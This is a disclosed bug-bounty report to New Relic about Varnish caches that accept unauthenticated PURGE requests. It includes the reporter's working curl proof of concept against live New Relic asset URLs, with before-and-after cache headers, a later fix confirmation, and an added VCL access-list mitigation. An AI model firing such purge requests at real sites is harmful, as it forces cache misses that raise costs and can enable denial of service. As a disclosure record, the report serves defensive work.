URL: https://hackerone.com/reports/154278
Submission: On December 27 via manual from US — Scanned from DE

#154278
Cache purge requests are not authenticated

Timeline
nuc
submitted a report to New Relic.
July 27, 2016, 8:34am UTC
Hello there,
Anyone can issue a PURGE request for any resource and invalidate your caches.
That can lead to increased bandwidth costs but also potential Denial of Service
attacks.
Proof
Fetching the resource headers, we can see in the X-Cache that the resource was a
HIT with X-Cache-Hits: 50:
$ curl -s -D - https://js-agent.newrelic.com/nr-963.min.js -o /dev/null
HTTP/1.1 200 OK
x-amz-id-2: KVV+y19mk83Q4CfPt13sYJ2zss99mslCoWZexamnXBV00JcD1MsMkWyX2TCfutDi
x-amz-request-id: ECE65200E86566A5
Last-Modified: Tue, 05 Jul 2016 21:11:47 GMT
ETag: "c90a1fb4decbee70397700910b871292"
Content-Type: application/javascript
Server: AmazonS3
Content-Length: 22682
Accept-Ranges: bytes
Date: Wed, 27 Jul 2016 08:30:31 GMT
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: cache-ams4148-AMS
X-Cache: HIT
X-Cache-Hits: 50
X-Timer: S1469608231.893672,VS0,VE0
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Unauthenticated cache purge request:
$ curl -X PURGE https://js-agent.newrelic.com/nr-963.min.js
{"status": "ok", "id": "4441-1466032111-45820"}
X-Cache-Hits is now 1:
$ curl -s -D - https://js-agent.newrelic.com/nr-963.min.js -o /dev/null   10:32:50
HTTP/1.1 200 OK
x-amz-id-2: NywXGsmXU1opvJFZFzvd7S+LJaAqo8Hi8ncv96OY4dBRouEd3U2IeohQKIUtZgxua3VX6VkYt1A=
x-amz-request-id: 8083D7BD3C05145B
Last-Modified: Tue, 05 Jul 2016 21:11:47 GMT
ETag: "c90a1fb4decbee70397700910b871292"
Content-Type: application/javascript
Server: AmazonS3
Content-Length: 22682
Accept-Ranges: bytes
Date: Wed, 27 Jul 2016 08:32:49 GMT
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: cache-ams4430-AMS
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1469608369.972359,VS0,VE0
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Thank you, Giorgos
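The thread says the issue was fixed but does not show how. As an added example (not New Relic's configuration and not part of the report), this is the standard way a Varnish 4 VCL restricts PURGE to an allow-list of source addresses; the "localhost" and 10.0.0.0/8 entries are assumed placeholders for an operator's own management network:

```vcl
vcl 4.0;

# Addresses allowed to purge. The internal range is an assumed placeholder;
# replace it with the real management network of the deployment.
acl purge {
    "localhost";
    "127.0.0.1";
    "10.0.0.0"/8;
}

sub vcl_recv {
    # Varnish 3 spells this field req.request instead of req.method.
    if (req.method == "PURGE") {
        # Reject a purge from any address outside the ACL before the cache is touched.
        if (!client.ip ~ purge) {
            return (synth(405, "PURGE not allowed from this address"));
        }
        # Invalidate every stored variant of this object; the built-in
        # vcl_purge then answers with a synthetic 200 "Purged".
        return (purge);
    }
}
```

With this loaded, a PURGE like the one in the report gets a 405 from any address outside the ACL and the object's X-Cache-Hits counter keeps climbing. One caveat: client.ip is the TCP peer address, so if a load balancer or another CDN layer sits in front of Varnish every purge appears to come from that layer and an address ACL alone is not enough; in that case the same branch should additionally check a shared secret carried in a request header, or PURGE should be disabled at the public edge altogether.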
imelven
 posted a comment. 
July 29, 2016, 7:05pm UTC
Hi, thanks for your report! We really appreciate you reporting this issue to us
and will begin investigating.
imelven
 posted a comment. 
July 30, 2016, 12:07am UTC
Hi Giorgos - have you found this on any other sites besides
js-agent.newrelic.com?
nuc
 posted a comment. 
July 30, 2016, 6:25am UTC
Hello there,
Any requests that are served via varnish are affected.
Here are a couple more examples:
 * https://www.newrelic.de/assets/application_head-d0a02370d08b464f88ae149b7d3022f4.js
 * https://common.nr-assets.net/common-libs-2.min.js

Giorgos
mlapworth
 changed the status to Triaged. 
August 1, 2016, 5:44pm UTC
Hi Giorgos,
Our engineering team is working on fixing this issue.
Thanks, Matthew
mlapworth
 closed the report and changed the status to Resolved. 
August 2, 2016, 8:58pm UTC
Hi Giorgos,
This issue has been resolved. Thank you for reporting it to us!
Cheers, Matthew
nuc
 posted a comment. 
August 2, 2016, 9:09pm UTC
I can verify it's resolved.
Thanks for the thanks :)
Cheers, Giorgos
imelven
 requested to disclose this report. 
February 18, 2017, 1:41am UTC

This report has been disclosed.
March 20, 2017, 1:42am UTC
New Relic
 has decided that this report is not eligible for a bounty. 
May 3, 2018, 3:31am UTC


Reported July 27, 2016, 8:34am UTC


nuc

Participants


Report Id
#154278
Resolved

Reported to
New Relic


--------------------------------------------------------------------------------

Disclosed
March 20, 2017, 1:42am UTC

Severity
No Rating (---)

Weakness
None

Bounty
None

Time spent
None


--------------------------------------------------------------------------------

CVE ID
None

Account de...
None


--------------------------------------------------------------------------------

